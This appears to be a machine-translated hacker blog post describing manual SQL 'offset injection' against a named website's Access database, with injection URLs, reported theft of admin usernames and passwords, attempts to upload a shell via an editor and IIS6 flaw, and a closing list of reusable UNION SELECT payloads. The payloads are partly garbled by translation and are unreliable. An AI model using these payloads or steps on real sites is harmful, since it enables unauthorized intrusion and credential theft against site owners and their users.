Practices of access SQL offset Injection

Author: F4usT
It's okay for the past two days. It's boring to practice manual injection. Enter "" For a URL. An error is returned! Then, and finds an injection! Then, determine that the database type is access, and then determine the fourteen fields.
Http://www.f4le.com/show_new.asp? Bh = 397% 20and % 201 = 2% 20 union % 20 select %, from % 20 users

Then, the user name and password fields are cracked according to the general idea, but none of them work. Then, the system tries to crack the password, but it still does not work. Then Baidu finds the injection statement and finds that the injection is cheap. Try, but fail, and seek help from the group. Thank you for your time!
It still uses offset injection. When he sent it to him, I realized that my injection statement was wrong .. Or I am just taking the lead. Then, the user name and password are obtained successfully using the injection statement.
Http://www.f4le.com/show_new.asp? Bh = 394% 20and % 201 = 2% 20 union % 20 select % 20 * % 20 from % 20 (users % 20as % 20a % 20 inner % 20 join % 20 users % 20as % 20b % 20o

Find the background login, but found that the function is too simple

However, the ewe editor prompts that the free version of hxcms 7.5 has a server with the original name and remote upload, iis6., parsing the vulnerability, and the uploaded image is renamed, and then testing the remote upload oday, however, the name still takes the suffix of the file and rename it. It's depressing! So it is really difficult to get the shell, and then want to download the 7.5 source code to see, but the Internet did not find the 7.5 free version of the source code, so you can only give up.
In fact, the main learning is that the injection statement has summarized the offset injection slightly.
The general statement is as follows:
And 1 = 2 union select * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select 1, * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select 1, 2, * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select 1, 2, 3, * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select 1, 2, 3, *-1, * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select 1, a. id, * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select 1, a. id, B. id, * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select * from (users as a inner join users as B on a. id = B. id)
And 1 = 2 union select * from (select * from admin) as a inner join (select * from admin) as B on. id = B. id) inner join (select id from admin) as c on c. id =. id
And so on.
Ps: flexible use !!!